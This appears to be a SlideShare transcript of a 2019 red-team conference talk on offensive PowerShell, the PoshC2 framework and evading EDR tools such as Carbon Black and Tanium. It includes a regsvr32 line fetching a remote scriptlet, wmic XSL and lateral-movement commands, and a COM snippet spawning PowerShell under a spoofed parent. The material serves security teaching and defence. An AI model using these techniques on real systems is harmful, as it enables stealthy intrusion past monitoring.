SlideShare a Scribd company logo

powershell-is-dead-epic-learnings-london

Download as PPTX, PDF
N
nettitude_labs

PowerShell is often considered a threat vector by security tools like Carbon Black due to its powerful capabilities. However, the presentation argues that PowerShell is not dead and outlines ways attackers have evolved their PowerShell techniques to avoid detection. It demonstrates a C# PowerShell implant that uses reflection to bypass detection and discusses exploiting COM objects and Junction folders to migrate between processes like Internet Explorer."

Internet
1 of 82
PowerShell is DEAD Epic Learnings June 2019
Contents Introductions + Whoami / Whoarewe What is PowerShell + Understand what PowerShell is / key components + Is it DEAD? Evolution of PoshC2 + Release timeline & changes EDR + History & challenges (offensive) + Future predictions June 2019
@benpturner + Managing Principal Security Consultant @ Nettitude + Lead the Global Red Team Operation @ Nettitude + 8 years as a Crest Team Leader (CHECK Team Leader - Infrastructure) + 4 years as a Crest Simulated Attack Specialist (CCSAS - STAR/CBEST) Training / Talks + Advanced Threat Actor Simulation - Red Team Training Course (Steelcon 2017/2018) + Workshops - Red Teaming with PoshC2 (BSides London/Manchester 2017) + Trusted Third Parties are NOT Trust Worthy (GiSEC Dubai 2019) - https://bit.ly/2I9ehIg + 21st Century War Stories (Steelcon/BSides 2016) - https://www.youtube.com/watch?v=O8Ul6QSPuo4 + PowerShell Fu with Metasploit (Steelcon/BSides 2015) - https://www.youtube.com/watch?v=ottfZFRSsj4 Development Projects + Lead developer of PoshC2 - Nettitude’s Open Source Command & Control (C2) Framework + General day to day PowerShell / C# projects & security research
@b4ggio_su + Principal Security Consultant @ Nettitude + A Red Team Lead in the Global Red Team Operation @ Nettitude + 16 years in IT: • 4 years as a sysadmin • 4 years in a defensive role • 8 years in an offensive role Training / Talks + Advanced Threat Actor Simulation - Red Team Training Course + Red Team & Stuff (Bsides Mcr 2018 / OWASP Warwick 2019)
@rbmaslen + Principal Security Consultant @ Nettitude + Red Teamer/Tools developer + 20 years in IT: • 14 years as a developer (mainly C++, C#, HTML/JS) • 6 years in an offensive role + CCT / CCSAM / OSCP / OSCE Training / Talks + Thick Client Destruction (Steelcon 2017) + COM and the PowerThIEf (Steelcon 2018) Development Projects + Contributor to PoshC2 - Nettitude’s Open Source Command & Control (C2) Framework + PowerThIEf, SharpSocks, C# portscanner & ArpScan
Team Spicy Weasel 1st Place - 2018 + labs.nettitude.com/blog/derbycon-2018-ctf-write-up 1st Place - 2017 + labs.nettitude.com/blog/derbycon-2017-ctf-write-up 3rd Place - 2016 + labs.nettitude.com/blog/derbycon-2016-ctf-write-up
What is PowerShell & is it DEAD? 1. The Microsoft binary - ”PowerShell.exe” 2. The DLL behind the binary ”System.Management.Automation.Dll” 3. The folder - C:WindowsSystem32WindowsPowerShellv1 .0 4. The version? Is PSv2 dead or only versions after 4 because of Transcript Logging, ScriptBlock Logging, Module Logging & AMSI Integration https://www.youtube.com/watch?v=IYD_aiQtVaE
Is PowerShell DEAD? Evolution of PoshC2
Evolution of PoshC2 2016 -> 2019  2016  June - v1.0 First Release of PoshC2 (Server/Implant in PowerShell)  Dec - v2.0 Released - C# GUI, Daisy Chaining & Portability  2017  Mar - v2.1 Removed C# GUI  May - PoshC2 Slack channel announced  July - PoshC2_Python Release  Oct – Reflective DLL / Shellcode Released  Nov - v3.0 Released with SharpSocks  2018  Feb - Readthedocs Documentation Released  July - v4.0 Released with Python Implant  2019  Jan - v4.8 Sharp Implant  Feb - Support for 2003/XP  June - SharpSocks Integration
PoshC2 – PowerShell Server
Process Listing – Initial Execution
Generic PowerShell Implant
Carbon Black / Tanium / EDR 1. This is probably the best query in carbon black to detect malicious activity: “process_name:powershell.exe” 2. Do a search across your estate and see how much this shows up…….
Carbon Black / Tanium / EDR 1. This is probably the best query in carbon black to detect malicious activity: “modload:system.management.automation.dll” “modload:system.management.automation.ni.dll” 2. Filter out “powershell.exe”, and others…… 3. Do a search across your estate and see how much this shows up…….
Defensive / Legacy Approach (Reactive)  Block powershell.exe on all endpoints  Only allow signed powershell scripts to be executed  Upgrade “powershell.exe” to v5.0 for greater visibility  Enable constrained mode to restrict language elements  Monitor for “System.Management.Automation.Dll” in processes  Integrate AMSI with AV vendor for early signature detection  Enable & Monitor ScriptBlock Logging for suspicious cmdlets  Enable & Monitor Transcript Logging for suspicious signatures  Enable & Monitor Module Logging for signatured modules Modern Approach (Proactive)
“ ” Is PowerShell DEAD
“ ” NO ITS NOT
“ ” APT33 according to FireEye
Supposedly Used by APT 33  Suspected attribution: Iran  Target sectors: Aerospace, energy  Overview: APT33 has targeted organizations, spanning multiple industries, headquartered in the U.S., Saudi Arabia and South Korea. APT33 has shown particular interest in organizations in the aviation sector involved in both military and commercial capacities, as well as organizations in the energy sector with ties to petrochemical production • https://www.fireeye.com/blog/threat- research/2018/12/overruled-containing-a-potentially- destructive-adversary.html • https://www.fireeye.com/blog/threat- research/2017/09/apt33-insights-into-iranian-cyber- espionage.html • https://www.fireeye.com/current-threats/apt- groups.html#apt33
Introducing C# Implant
PoshC2_Python
PoshC2_Python
C# Implant
C# Implant / Reflection
C# Implant / Reflection  loadmodule Seatbelt.exe  run-exe Seatbelt.Program Seatbelt all  run-exe Seatbelt.Program Seatbelt PowerShellSettings  run-dll Seatbelt.Program Seatbelt UserChecks
C# Reflection  foreach (var Ass in AppDomain.CurrentDomain.GetAssemblies())  run-exe loadedType.Assembly.EntryPoint.Invoke(null, new object[] { splitnewargs }).ToString();  run-dll loadedType.Assembly.GetType(qualifiedname).InvokeMember(s Method, BindingFlags.Public | BindingFlags.InvokeMethod | BindingFlags.Static, null, null, new object[] { splitnewargs }).ToString();
C# Reflection / OpSec Considerations
EDR / Next Gen AV
Example Vendors
Endpoint Detection and Response
Attacker Thoughts  Avoidance  Trickery  Partying with EDR
Avoidance
Avoidance - Carbon Black Detected – But why: RTFM!
Avoidance – Tanium Signal Definition image.path contains ‘system.management.automation’ AND process.path contains NOT ‘mscorsvw.exe’ AND process.path contains NOT ‘monitoringhost.exe’ AND process.path contains NOT ‘powershell.exe’ AND process.path contains NOT ‘powershell_ise.exe’ AND process.path contains NOT ‘sdiagnhost.exe’ AND process.path contains NOT ‘servermanager.exe’ AND process.path contains NOT ‘sqlps.exe’ AND process.path contains NOT ‘wsmprovhost.exe’ AND process.path contains NOT ‘Microsoft Azure AD SyncBinmiiserver.exe’ (Does require process tracing to be enabled in Tanium - quite heavy) Warning - Not doing a hash checksum on the processes or their location
Trickery
Parent PID Spoofing https://stackoverflow.com/questions/10554913/how-to-call-createprocess-with- startupinfoex-from-c-sharp-and-re-parent-the-ch
Parent PID Spoofing / Carbon Black
Detecting Parent Spoofing https://www.countercept.com/blog/detecting-parent-pid- spoofing/
Process Argument Spoofing
Process Argument Spoofing 1. Create a process suspended – Fake Arguments 2. Identify the PEB using NTQueryProcessInformation 3. Parse PEB and Commandline structure 4. Overwrite the Commandline arguments using WriteProcessMemory – Real Arguments 5. Resume the process
Process Argument Spoofing  https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing  https://blog.xpnsec.com/how-to-argue-like-cobalt-strike/  https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/
Process Argument Spoofing – WHY? Execution  Powershell One Liner  regsvr32.exe /s /i:http://URL/file.sct scrobj.dll  wmic os get /FORMAT:”evil.xsl” Lateral Movement  SC COMPUTERNAME stop "SERVICENAME“  wmic.exe /node:<target> /user:<user> /password:"<password>" process call create "%Systemroot%Tempbatchfile.bat“
Partying with EDR
Partying With EDR Migration Basics - Win API Calls:  VirtualAllocEX  WriteProcessMemory  CreateRemoteThread http://deniable.org/misc/inject-all-the-things However there are many ways to do the same thing, quick examples: RtlCreateUserThread SetWindowsHookEx NtCreateThreadEx QueueUserAPC
“In computer programming, the term hooking covers a range of techniques used to alter or augment the behaviour of an operating system, of applications, or of other software components by intercepting function calls or messages or events passed between software components. Code that handles such intercepted function calls, events or messages is called a hook.” - Wikipedia What is Hooking?
EDR Hooking
Before EDR
After EDR
After EDR
Other EDR’s
Other EDR’s
 Re-Patch Memory to remove JMP to original code  Update the IAT table to point to the correct function  Create a stub – to carry out the same system calls  Free a number of API calls and use FreeLibrary to remove interfering DLL’s https://medium.com/@fsx30/bypass-edrs-memory-protection- introduction-to-hooking-2efb21acffd6 Bringing Back The Good Times
Demo
Demo
“ ” Becoming best mates with COM
COM Intro – just watch this https://vimeo.com/214856542
 Spoke about this at Steelcon last year, has proved really handy  Has been used to get past some EDRs  Breaks the attribution between process Migrating with COM into IE
The key to this? Junction folders  Junction folders, a technique leaked in the Vault 7 dumps  Forms the basis of Sandbox escapers recent IE 11 sandbox escape  After adding some registry keys allows code to be executed when you navigate to a folder
Junction folders
Loading the DLL in IE – first setup the registry
 If we can get a reference to an IE Windows we can call  URL needs to be in the format shell:::{<GUID>}  https://docs.microsoft.com/en-us/previous- versions/windows/internet-explorer/ie-developer/platform- apis/aa752094(v%3Dvs.85) How can we use that
 Great COM class allows you to enumerate all the current open IE & Explorer windows and automate them  Guess what you can then get them to navigate to a new location  https://msdn.microsoft.com/en- us/library/windows/desktop/bb773974(v=vs.85).aspx ShellWindows
Loading the DLL in IE, PowerShell $shellWinGuid = [System.Guid]::Parse("{9BA05972-F6A8-11CF-A442- 00A0C90A8F39}") $typeShwin = [System.Type]::GetTypeFromCLSID($shellWinGuid) $shwin = [System.Activator]::CreateInstance($typeShwin) $shWin[0].Navigate2("shell:::{56B6E39E-AB81-4E34-BC8B-99D1D28FB7E4}", 2048) /*CLSID must be in the format "shell:::{CLSID}" Second param 2048 is BrowserNavConstants value for navOpenInNewTab https://msdn.microsoft.com/en-us/library/dd565688(v=vs.85).aspx Further ideas on what payloads you may be able to use */
Weaponisable? Yes in VBA
Can you do this in VBA, yes of course
Can you do this in VBA, yes of course
 Only use Native DLL’s? thankfully not  Using CCW’s Com Callable Wrappers we can write a .net dll and configure the registry keys so that when navigated to we can launch a .net dll. Use this as a COM Hijack if you want.  No time to go into CCW in depth but have a read of https://docs.microsoft.com/en- us/dotnet/framework/interop/com-callable-wrapper  .Net is started in IE and loads the dll  We need a .net assembly with class that implements an interface and some registry keys COM Callable Wrapper
COM Callable Wrapper – Class Interface
Native dll’s only?
Getting the reg keys
Setting up the .net registry keys
Setting up the .net registry keys  Just make sure that you create or import the keys from a x64 application or use the explicit 64 bit key from the link below  https://docs.microsoft.com/en- us/windows/desktop/sysinfo/32-bit-and-64-bit-application- data-in-the-registry
Also guess what the IE shortcut now does?
One last thing – remember this script $shellWinGuid = [System.Guid]::Parse("{9BA05972-F6A8-11CF-A442- 00A0C90A8F39}") $typeShwin = [System.Type]::GetTypeFromCLSID($shellWinGuid) $shwin = [System.Activator]::CreateInstance($typeShwin) $shWin[0].Navigate2("shell:::{56B6E39E-AB81-4E34-BC8B-99D1D28FB7E4}", 2048) /*CLSID must be in the format "shell:::{CLSID}" Second param 2048 is BrowserNavConstants value for navOpenInNewTab https://msdn.microsoft.com/en-us/library/dd565688(v=vs.85).aspx Further ideas on what payloads you may be able to use */
Lets tweak it $shellWinGuid = [System.Guid]::Parse("{9BA05972-F6A8-11CF-A442- 00A0C90A8F39}") $typeShwin = [System.Type]::GetTypeFromCLSID($shellWinGuid) $shwin = [System.Activator]::CreateInstance($typeShwin) $shWin[0].Navigate("c:windowssystem32WindowsPowerShellv1.0powers hell.exe")
Running it (must have at least 1 explorer window open)
Look who the parent is?
EDR Summary  EDR is not a silver bullet  Does give incredible visibility to the Blue Team  Highly recommended as a complimentary piece to the defensive strategy but should not be solely relied on  Does not replace good people with experience  Constant Cat and Mouse game
Future Predictions 1. Over reliance on EDR, especially on user endpoints and not server land or non Windows Systems 2. Customers focussing all attention on tertiary endpoints and not on critical functions or sensitive customer data 3. Move to Zerotrust networks and MFA everywhere 4. Machine Learning – Investment into Process & Procedures 5. C2 frameworks moving to C++ base code – Could see MSF be revived for red teaming 6. All standard AV/EDR vendors adopting in memory scanning / AMSI 7. Windows 7 is EOL January 2020 – not a prediction but a reality 8. Windows 10 removal of .NET v2 – not a prediction but a reality 9. People going back to single executables running either C++ or C# code to evade LOLBAS signatures (LOLBAS vs arbitrary exe)
Future Predictions 1. Over reliance on EDR, especially on endpoints and not server land (or unix really) 2. C2 frameworks moving to C++ base code – Could see MSF be revived for RT 3. We already have this level of capability and its interesting what gets detected and what does not 4. All standard AV/EDR vendors adopting in memory scanning 5. Windows 7 is EOL January 2020 – not a prediction but a massive jump 6. Windows 10 removal of .NET v2 7. People going back to single executables running either c++ or c# code to evade lolbins signatures and
THANK YOU Ben Turner @benpturner Doug McLeod @b4ggio_su Rob Maslen @rbmaslen https://www.steelcon.info/training/ https://www.slideshare.net/nettitude_labs/powershell-is-dead-epic-learning

Recommended

The Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active DirectoryThe Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active Directory
Will Schroeder
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active Directory
Will Schroeder
 
Here Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLsHere Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLs
Andy Robbins
 
COM Hijacking Techniques - Derbycon 2019
COM Hijacking Techniques - Derbycon 2019COM Hijacking Techniques - Derbycon 2019
COM Hijacking Techniques - Derbycon 2019
David Tulis
 
ReCertifying Active Directory
ReCertifying Active DirectoryReCertifying Active Directory
ReCertifying Active Directory
Will Schroeder
 
I Have the Power(View)
I Have the Power(View)I Have the Power(View)
I Have the Power(View)
Will Schroeder
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash Course
Scott Sutherland
 
.NETからActive Directoryデータにアクセス ~グループ情報の取得と表示~
.NETからActive Directoryデータにアクセス ~グループ情報の取得と表示~.NETからActive Directoryデータにアクセス ~グループ情報の取得と表示~
.NETからActive Directoryデータにアクセス ~グループ情報の取得と表示~Michio Koyama
 

Recommended

The Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active DirectoryThe Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active Directory
Will Schroeder
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active Directory
Will Schroeder
 
Here Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLsHere Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLs
Andy Robbins
 
COM Hijacking Techniques - Derbycon 2019
COM Hijacking Techniques - Derbycon 2019COM Hijacking Techniques - Derbycon 2019
COM Hijacking Techniques - Derbycon 2019
David Tulis
 
ReCertifying Active Directory
ReCertifying Active DirectoryReCertifying Active Directory
ReCertifying Active Directory
Will Schroeder
 
I Have the Power(View)
I Have the Power(View)I Have the Power(View)
I Have the Power(View)
Will Schroeder
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash Course
Scott Sutherland
 
.NETからActive Directoryデータにアクセス ~グループ情報の取得と表示~
.NETからActive Directoryデータにアクセス ~グループ情報の取得と表示~.NETからActive Directoryデータにアクセス ~グループ情報の取得と表示~
.NETからActive Directoryデータにアクセス ~グループ情報の取得と表示~Michio Koyama
 
0x003 - Exploiting LOLDrivers - Physical Memory Mayhem
0x003 - Exploiting LOLDrivers - Physical Memory Mayhem0x003 - Exploiting LOLDrivers - Physical Memory Mayhem
0x003 - Exploiting LOLDrivers - Physical Memory Mayhem
Russell Sanford
 
2017 Secure360 - Hacking SQL Server on Scale with PowerShell
2017 Secure360 - Hacking SQL Server on Scale with PowerShell2017 Secure360 - Hacking SQL Server on Scale with PowerShell
2017 Secure360 - Hacking SQL Server on Scale with PowerShell
Scott Sutherland
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
Sunny Neo
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat Hunting
GIBIN JOHN
 
Cyber Threat hunting workshop
Cyber Threat hunting workshopCyber Threat hunting workshop
Cyber Threat hunting workshop
Arpan Raval
 
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
DirkjanMollema
 
Red Team Methodology - A Naked Look
Red Team Methodology - A Naked LookRed Team Methodology - A Naked Look
Red Team Methodology - A Naked Look
Jason Lang
 
Super Easy Memory Forensics
Super Easy Memory ForensicsSuper Easy Memory Forensics
Super Easy Memory Forensics
IIJ
 
Upping the APT hunting game: learn the best YARA practices from Kaspersky
Upping the APT hunting game: learn the best YARA practices from KasperskyUpping the APT hunting game: learn the best YARA practices from Kaspersky
Upping the APT hunting game: learn the best YARA practices from Kaspersky
Kaspersky
 
I hunt sys admins 2.0
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0
Will Schroeder
 
WTF is Penetration Testing v.2
WTF is Penetration Testing v.2WTF is Penetration Testing v.2
WTF is Penetration Testing v.2
Scott Sutherland
 
Windows privilege escalation by Dhruv Shah
Windows privilege escalation by Dhruv ShahWindows privilege escalation by Dhruv Shah
Windows privilege escalation by Dhruv Shah
OWASP Delhi
 
MacOS forensics and anti-forensics (DC Lviv 2019) presentation
MacOS forensics and anti-forensics (DC Lviv 2019) presentationMacOS forensics and anti-forensics (DC Lviv 2019) presentation
MacOS forensics and anti-forensics (DC Lviv 2019) presentation
OlehLevytskyi1
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find Them
Ross Wolf
 
Windows Operating System Archaeology
Windows Operating System ArchaeologyWindows Operating System Archaeology
Windows Operating System Archaeology
enigma0x3
 
aclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundaclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHound
DirkjanMollema
 
Empowering red and blue teams with osint c0c0n 2017
Empowering red and blue teams with osint c0c0n 2017Empowering red and blue teams with osint c0c0n 2017
Empowering red and blue teams with osint c0c0n 2017
reconvillage
 
OWASP Top Ten 2017
OWASP Top Ten 2017OWASP Top Ten 2017
OWASP Top Ten 2017
Michael Furman
 
Social Engineering the Windows Kernel by James Forshaw
Social Engineering the Windows Kernel by James ForshawSocial Engineering the Windows Kernel by James Forshaw
Social Engineering the Windows Kernel by James Forshaw
Shakacon
 
Threat-Based Adversary Emulation with MITRE ATT&CK
Threat-Based Adversary Emulation with MITRE ATT&CKThreat-Based Adversary Emulation with MITRE ATT&CK
Threat-Based Adversary Emulation with MITRE ATT&CK
Katie Nickels
 
DotNet Introduction
DotNet IntroductionDotNet Introduction
DotNet Introduction
Wei Sun
 
Runtime Environment Of .Net Divya Rathore
Runtime Environment Of .Net Divya RathoreRuntime Environment Of .Net Divya Rathore
Runtime Environment Of .Net Divya Rathore
Esha Yadav
 

More Related Content

What's hot

0x003 - Exploiting LOLDrivers - Physical Memory Mayhem
0x003 - Exploiting LOLDrivers - Physical Memory Mayhem0x003 - Exploiting LOLDrivers - Physical Memory Mayhem
0x003 - Exploiting LOLDrivers - Physical Memory Mayhem
Russell Sanford
 
2017 Secure360 - Hacking SQL Server on Scale with PowerShell
2017 Secure360 - Hacking SQL Server on Scale with PowerShell2017 Secure360 - Hacking SQL Server on Scale with PowerShell
2017 Secure360 - Hacking SQL Server on Scale with PowerShell
Scott Sutherland
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
Sunny Neo
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat Hunting
GIBIN JOHN
 
Cyber Threat hunting workshop
Cyber Threat hunting workshopCyber Threat hunting workshop
Cyber Threat hunting workshop
Arpan Raval
 
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
DirkjanMollema
 
Red Team Methodology - A Naked Look
Red Team Methodology - A Naked LookRed Team Methodology - A Naked Look
Red Team Methodology - A Naked Look
Jason Lang
 
Super Easy Memory Forensics
Super Easy Memory ForensicsSuper Easy Memory Forensics
Super Easy Memory Forensics
IIJ
 
Upping the APT hunting game: learn the best YARA practices from Kaspersky
Upping the APT hunting game: learn the best YARA practices from KasperskyUpping the APT hunting game: learn the best YARA practices from Kaspersky
Upping the APT hunting game: learn the best YARA practices from Kaspersky
Kaspersky
 
I hunt sys admins 2.0
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0
Will Schroeder
 
WTF is Penetration Testing v.2
WTF is Penetration Testing v.2WTF is Penetration Testing v.2
WTF is Penetration Testing v.2
Scott Sutherland
 
Windows privilege escalation by Dhruv Shah
Windows privilege escalation by Dhruv ShahWindows privilege escalation by Dhruv Shah
Windows privilege escalation by Dhruv Shah
OWASP Delhi
 
MacOS forensics and anti-forensics (DC Lviv 2019) presentation
MacOS forensics and anti-forensics (DC Lviv 2019) presentationMacOS forensics and anti-forensics (DC Lviv 2019) presentation
MacOS forensics and anti-forensics (DC Lviv 2019) presentation
OlehLevytskyi1
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find Them
Ross Wolf
 
Windows Operating System Archaeology
Windows Operating System ArchaeologyWindows Operating System Archaeology
Windows Operating System Archaeology
enigma0x3
 
aclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundaclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHound
DirkjanMollema
 
Empowering red and blue teams with osint c0c0n 2017
Empowering red and blue teams with osint c0c0n 2017Empowering red and blue teams with osint c0c0n 2017
Empowering red and blue teams with osint c0c0n 2017
reconvillage
 
OWASP Top Ten 2017
OWASP Top Ten 2017OWASP Top Ten 2017
OWASP Top Ten 2017
Michael Furman
 
Social Engineering the Windows Kernel by James Forshaw
Social Engineering the Windows Kernel by James ForshawSocial Engineering the Windows Kernel by James Forshaw
Social Engineering the Windows Kernel by James Forshaw
Shakacon
 
Threat-Based Adversary Emulation with MITRE ATT&CK
Threat-Based Adversary Emulation with MITRE ATT&CKThreat-Based Adversary Emulation with MITRE ATT&CK
Threat-Based Adversary Emulation with MITRE ATT&CK
Katie Nickels
 

What's hot (20)

0x003 - Exploiting LOLDrivers - Physical Memory Mayhem
0x003 - Exploiting LOLDrivers - Physical Memory Mayhem0x003 - Exploiting LOLDrivers - Physical Memory Mayhem
0x003 - Exploiting LOLDrivers - Physical Memory Mayhem
 
2017 Secure360 - Hacking SQL Server on Scale with PowerShell
2017 Secure360 - Hacking SQL Server on Scale with PowerShell2017 Secure360 - Hacking SQL Server on Scale with PowerShell
2017 Secure360 - Hacking SQL Server on Scale with PowerShell
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat Hunting
 
Cyber Threat hunting workshop
Cyber Threat hunting workshopCyber Threat hunting workshop
Cyber Threat hunting workshop
 
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
 
Red Team Methodology - A Naked Look
Red Team Methodology - A Naked LookRed Team Methodology - A Naked Look
Red Team Methodology - A Naked Look
 
Super Easy Memory Forensics
Super Easy Memory ForensicsSuper Easy Memory Forensics
Super Easy Memory Forensics
 
Upping the APT hunting game: learn the best YARA practices from Kaspersky
Upping the APT hunting game: learn the best YARA practices from KasperskyUpping the APT hunting game: learn the best YARA practices from Kaspersky
Upping the APT hunting game: learn the best YARA practices from Kaspersky
 
I hunt sys admins 2.0
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0
 
WTF is Penetration Testing v.2
WTF is Penetration Testing v.2WTF is Penetration Testing v.2
WTF is Penetration Testing v.2
 
Windows privilege escalation by Dhruv Shah
Windows privilege escalation by Dhruv ShahWindows privilege escalation by Dhruv Shah
Windows privilege escalation by Dhruv Shah
 
MacOS forensics and anti-forensics (DC Lviv 2019) presentation
MacOS forensics and anti-forensics (DC Lviv 2019) presentationMacOS forensics and anti-forensics (DC Lviv 2019) presentation
MacOS forensics and anti-forensics (DC Lviv 2019) presentation
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find Them
 
Windows Operating System Archaeology
Windows Operating System ArchaeologyWindows Operating System Archaeology
Windows Operating System Archaeology
 
aclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundaclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHound
 
Empowering red and blue teams with osint c0c0n 2017
Empowering red and blue teams with osint c0c0n 2017Empowering red and blue teams with osint c0c0n 2017
Empowering red and blue teams with osint c0c0n 2017
 
OWASP Top Ten 2017
OWASP Top Ten 2017OWASP Top Ten 2017
OWASP Top Ten 2017
 
Social Engineering the Windows Kernel by James Forshaw
Social Engineering the Windows Kernel by James ForshawSocial Engineering the Windows Kernel by James Forshaw
Social Engineering the Windows Kernel by James Forshaw
 
Threat-Based Adversary Emulation with MITRE ATT&CK
Threat-Based Adversary Emulation with MITRE ATT&CKThreat-Based Adversary Emulation with MITRE ATT&CK
Threat-Based Adversary Emulation with MITRE ATT&CK
 

Similar to powershell-is-dead-epic-learnings-london

DotNet Introduction
DotNet IntroductionDotNet Introduction
DotNet Introduction
Wei Sun
 
Runtime Environment Of .Net Divya Rathore
Runtime Environment Of .Net Divya RathoreRuntime Environment Of .Net Divya Rathore
Runtime Environment Of .Net Divya Rathore
Esha Yadav
 
Production Debugging at Code Camp Philly
Production Debugging at Code Camp PhillyProduction Debugging at Code Camp Philly
Production Debugging at Code Camp Philly
Brian Lyttle
 
CSW2017 Amanda rousseau cansecwest2017_net_hijacking_powershell
CSW2017 Amanda rousseau cansecwest2017_net_hijacking_powershellCSW2017 Amanda rousseau cansecwest2017_net_hijacking_powershell
CSW2017 Amanda rousseau cansecwest2017_net_hijacking_powershell
CanSecWest
 
Dotnetintroduce 100324201546-phpapp02
Dotnetintroduce 100324201546-phpapp02Dotnetintroduce 100324201546-phpapp02
Dotnetintroduce 100324201546-phpapp02
Wei Sun
 
Codeigniter
CodeigniterCodeigniter
Codeigniter
minhrau111
 
Operator SDK for K8s using Go
Operator SDK for K8s using GoOperator SDK for K8s using Go
Operator SDK for K8s using Go
CloudOps2005
 
Overview Of Parallel Development - Ericnel
Overview Of Parallel Development - EricnelOverview Of Parallel Development - Ericnel
Overview Of Parallel Development - Ericnel
ukdpe
 
Beyond Breakpoints: A Tour of Dynamic Analysis
Beyond Breakpoints: A Tour of Dynamic AnalysisBeyond Breakpoints: A Tour of Dynamic Analysis
Beyond Breakpoints: A Tour of Dynamic Analysis
C4Media
 
How to write clean & testable code without losing your mind
How to write clean & testable code without losing your mindHow to write clean & testable code without losing your mind
How to write clean & testable code without losing your mind
Andreas Czakaj
 
Activity 5
Activity 5Activity 5
Activity 5
Heidi Owens
 
.Net Hijacking to Defend PowerShell BSidesSF2017
.Net Hijacking to Defend PowerShell BSidesSF2017 .Net Hijacking to Defend PowerShell BSidesSF2017
.Net Hijacking to Defend PowerShell BSidesSF2017
Amanda Rousseau
 
LogChaos: Challenges and Opportunities of Security Log Standardization
LogChaos: Challenges and Opportunities of Security Log StandardizationLogChaos: Challenges and Opportunities of Security Log Standardization
LogChaos: Challenges and Opportunities of Security Log Standardization
Anton Chuvakin
 
.Net Debugging Techniques
.Net Debugging Techniques.Net Debugging Techniques
.Net Debugging Techniques
Bala Subra
 
.NET Debugging Tips and Techniques
.NET Debugging Tips and Techniques.NET Debugging Tips and Techniques
.NET Debugging Tips and Techniques
Bala Subra
 
MS Day EPITA 2010: Visual Studio 2010 et Framework .NET 4.0
MS Day EPITA 2010: Visual Studio 2010 et Framework .NET 4.0MS Day EPITA 2010: Visual Studio 2010 et Framework .NET 4.0
MS Day EPITA 2010: Visual Studio 2010 et Framework .NET 4.0
Thomas Conté
 
Visual Studio .NET2010
Visual Studio .NET2010Visual Studio .NET2010
Visual Studio .NET2010
Satish Verma
 
The Hacking Games - Operation System Vulnerabilities Meetup 29112022
The Hacking Games - Operation System Vulnerabilities Meetup 29112022The Hacking Games - Operation System Vulnerabilities Meetup 29112022
The Hacking Games - Operation System Vulnerabilities Meetup 29112022
lior mazor
 
Thug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclientThug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclient
Angelo Dell'Aera
 
SAP strikes back Your SAP server now counter attacks.
SAP strikes back Your SAP server now counter attacks.SAP strikes back Your SAP server now counter attacks.
SAP strikes back Your SAP server now counter attacks.
Dmitry Iudin
 

Similar to powershell-is-dead-epic-learnings-london (20)

DotNet Introduction
